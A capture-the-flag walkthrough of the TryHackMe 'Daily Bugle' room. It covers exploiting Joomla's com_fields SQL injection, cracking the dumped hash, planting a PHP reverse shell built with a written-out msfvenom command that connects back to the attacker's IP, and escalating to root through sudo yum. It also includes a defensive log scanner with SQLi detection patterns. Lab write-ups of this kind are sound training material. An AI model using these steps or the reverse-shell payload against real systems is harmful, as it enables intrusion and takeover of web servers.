Daily Bugle — TryHackMe

Port and Service Enumeration
Using nmap, we discover SSH on port 22, the Joomla CMS on port 80 and a MySQL server on port 3306:

Analysing the endpoints found by nmap, I discover an administrator login page to manage the website:

I tested basic SQL injection on this form and a brute-force attack, with no success. As Joomla is a CMS, I used Metasploit to determine the version.

Gaining a Foothold
Using searchsploit, I discover an SQL injection in the com_fields component (CVE-2017-8917) of the detected Joomla version 3.7.0:

I tried to use the Metasploit module joomla_comfields_sqli_rce to exploit this vulnerability, but it was not working. So I googled around and found a Python script on GitHub (joomblah) that dumps a username and password hash from the database:
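From the defender's side, the same vulnerability is what you would want to spot in the web server logs. As an added example (not part of this write-up, the room, or the joomblah script), here is a small Python checker that scans Apache-style access log lines for requests to the com_fields component whose parameters carry common SQL-injection markers; the log format, the sample lines and the marker list are assumptions.

```python
"""Scan web access logs for SQL-injection attempts against Joomla's com_fields
component (CVE-2017-8917). Added example for this write-up; the log format,
the sample lines and the marker list are assumptions, not data from the room."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" style access log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Typical union-/error-based SQLi markers; a starting point, not a complete list.
SQLI_MARKERS = re.compile(
    r"(\bunion\b.*\bselect\b|\bupdatexml\s*\(|\bextractvalue\s*\(|\bsleep\s*\(|"
    r"\bbenchmark\s*\(|\binformation_schema\b|--\s|/\*|'\s*(or|and)\b)",
    re.IGNORECASE,
)

def parse_line(line):
    """Fields of one log line as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_com_fields_sqli(url):
    """True when the request targets option=com_fields and any parameter value
    carries an SQLi marker. Deliberately scoped to the component the CVE lives
    in rather than acting as a general-purpose WAF rule."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if ("option", "com_fields") not in params:
        return False
    # parse_qsl decoded once already; decode again so a double-encoded quote
    # (%2527) does not slip past the markers.
    return any(SQLI_MARKERS.search(unquote(value)) for _, value in params)

def find_suspicious(log_lines):
    """(ip, url) for every parsed line that looks like a com_fields SQLi attempt."""
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec and is_com_fields_sqli(rec["url"]):
            hits.append((rec["ip"], rec["url"]))
    return hits

# Constructed sample traffic (not real logs): one unrelated request, one
# injection attempt against com_fields, one legitimate admin use of com_fields.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&search=%27%20OR%201%3D1--%20 HTTP/1.1" 500 1021',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /administrator/index.php?option=com_fields&view=fields HTTP/1.1" 200 2048',
]
```

Running find_suspicious(SAMPLE_LOG) flags only the 10.0.0.9 request; a 500 status on such a line is an extra hint that an error-based injection was attempted.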

Using John the Ripper, I cracked this bcrypt hash and recovered the password:

I tried logging in to the MySQL server and through SSH, but it did not work. However, it worked on the administration page mentioned above:

Just like WordPress, Joomla can be exploited through the plugins/templates installed on the website. In this instance, I exploited it by replacing the PHP code in the template's index.php with a reverse shell generated with msfvenom:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.17.226 LPORT=4444 -f raw > shell.php

I used Metasploit to set up a listener and got a connection back (netcat would also have worked):

Privilege Escalation
A quick look at the files in the current directory reveals a configuration.php file containing the username and password used to connect to the MySQL server. I also checked which users exist on the system and found jjameson:

As is so often the case, people tend to reuse the same password, so I tried these credentials over SSH, and it worked!

Checking which programs the current user can run as root reveals:
/usr/bin/yum

Following the instructions on GTFOBins, we get an interactive root shell by loading a custom yum plugin, retrieve the root flag and complete the challenge:

Thank you for reading this far!